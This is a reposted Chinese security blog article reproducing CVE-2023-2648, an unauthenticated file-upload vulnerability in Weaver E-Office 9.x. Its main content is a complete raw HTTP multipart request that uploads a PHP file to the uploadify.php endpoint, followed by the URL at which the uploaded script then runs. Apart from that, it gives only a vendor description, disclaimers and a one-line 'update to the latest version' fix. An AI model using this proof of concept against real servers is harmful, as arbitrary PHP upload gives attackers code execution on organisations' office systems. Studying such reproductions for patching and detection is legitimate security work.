泛微 E-Office 文件上传漏洞(CVE-2023-2648)

admin 2024年5月13日01:08:27评论56 views字数 1322阅读4分24秒阅读模式
声明:请勿将文章内的相关技术用于非法目的,如有相关非法行为与文章作者和本公众号无关。请遵守《中华人民共和国网络安全法》。

0X01 简介
泛微软件是业界领先的协同管理系统和解决方案供应商,凭借成熟的技术核心及雄厚的研发力量,基于先进的协同管理理念,自主研发了协同管理产品系列,包括泛微协同管理平台(e-cology)、泛微协同办公系统高级版(e-nature)、泛微协同办公系统标准版(e-office)和泛微协同政务系统(e-nation)四大产品系列,涵盖OA(协同办公)、EIP(企业信息门户)、KM(知识管理)、HRM(人力资源管理)、CRM(客户关系管理)、WM(工作流程管理)、PM(项目管理)、电子政务、内外网一体化管理等方面,并通过大量的客户积累和丰富的实践经验,在集团管理、高新技术、生产制造、咨询顾问、医药通信、房地产、酒店餐饮、金融业等领域形成了一整套成熟的行业解决方案。
官网:

https://www.weaver.com.cn/

漏洞编号:

CVE-2023-2648

影响范围:

Weaver E-Office 9.X版本

0X02 漏洞复现

【漏洞复现】泛微 E-Office 文件上传漏洞(CVE-2023-2648)

POC:

POST /inc/jquery/uploadify/uploadify.php HTTP/1.1Host: 192.168.17.131:8082User-Agent: testConnection: closeContent-Length: 502Accept-Encoding: gzipContent-Type: multipart/form-data; boundary=25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85



--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85Content-Disposition: form-data; name="Filedata"; filename="666.php"Content-Type: application/octet-stream



<?php phpinfo();?>



--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85----25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85Content-Disposition: form-data; name="file"; filename=""Content-Type: application/octet-stream



--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85—

【漏洞复现】泛微 E-Office 文件上传漏洞(CVE-2023-2648)

返回包有文件夹名返回表示利用成功。http://192.168.17.131:8082/attachment/3577684917/666.php

【漏洞复现】泛微 E-Office 文件上传漏洞(CVE-2023-2648)

0X03 修复建议

更新至最新版!

原文始发于微信公众号(皓月的笔记本):【漏洞复现】泛微 E-Office 文件上传漏洞(CVE-2023-2648)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月13日01:08:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   泛微 E-Office 文件上传漏洞(CVE-2023-2648)https://cn-sec.com/archives/2077446.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息